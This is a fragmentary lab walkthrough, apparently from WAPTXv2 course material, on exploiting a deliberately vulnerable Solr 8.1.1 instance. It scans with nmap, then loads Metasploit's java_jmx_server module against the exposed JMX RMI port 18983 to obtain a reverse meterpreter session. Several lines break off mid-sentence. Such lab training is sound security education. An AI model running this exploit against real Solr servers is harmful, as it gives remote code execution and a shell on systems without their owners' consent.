In the /home/developer/Downloads/solr-8.1.1/ directory, a vulnerable solr instance exists that
cd /home/developer/Downloads/solr-8.1.1/solr/bin
Now, spin up a penetration testing distribution and perform a thorough nmap scan against the
needed as well to identify the name where the JMX RMI interface is bound). You should see the below.
use exploit/multi/misc/java_jmx_server
set RPORT 18983
set LHOST
run
A new meterpreter session should be established.
© 2020 Caendra Inc. | WAPTXv2